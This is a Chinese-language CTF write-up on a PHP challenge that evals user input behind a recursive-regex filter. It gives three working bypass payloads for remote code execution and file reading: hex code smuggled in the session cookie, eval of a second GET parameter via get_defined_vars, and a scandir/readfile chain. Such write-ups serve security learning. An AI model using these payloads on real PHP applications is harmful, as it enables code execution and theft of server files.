题目地址:http://120.78.164.84:49006
<?php
if(';' === preg_replace('/[^\W]+\((?R)?\)/', '', $_GET['code'])) {
eval($_GET['code']);
} else {
show_source(__FILE__);
}
这里的正则匹配涉及到了PHP正则表达式的递归模式:
http://php.net/manual/zh/regexp.reference.recursive.php
代码很短,但是这里会把code最里面括号内的内容替换为空,一起来见识一下别的大佬用到的几种方法。
1,session_id
[GET] ?code=eval(hex2bin(session_id(session_start())));
PHPSESSID=7072696e745f722866696c655f6765745f636f6e74656e747328272e2e2f666c61675f7068706279703473732729293b
//print_r(file_get_contents('../flag_phpbyp4ss'));
session_id() 用于获取PHPSESSID的值
session_start() 用于使用当前cookie中的会话
hex2bin则将16进制转换为二进制,根据手册,只是换了一种存储方式,解决编码转换问题,本质没有变换。
2,get_defined_vars
?code=eval(next(current(get_defined_vars())));
&b=print_r(scandir('../'));print_r(file_get_contents('../flag_phpbyp4ss'));
current() 返回数组中的当前单元
next() 和 current() 的行为类似,只有一点区别,在返回值之前将内部指针向前移动一位。
这意味着它返回的是下一个数组单元的值并将数组指针向前移动了一位。
3,arrary_reverse&scandir
?code=readfile(next(array_reverse(scandir(dirname(chdir(dirname(getcwd())))))));
getcwd — 取得当前工作目录
dirname — 返回路径中的目录部分,给出一个包含有指向一个文件的全路径的字符串,本函数返回去掉文件名后的目录名
chdir — 改变目录
scandir — 列出指定路径中的文件和目录,返回一个array ,包含有 directory 中的文件和目录
array_reverse — 返回单元顺序相反的数组,接受数组 array 作为输入并返回一个单元为相反顺序的新数组(只有两个文件)
同类题目
RCTF 2018 的 r-cursive,但环境不同。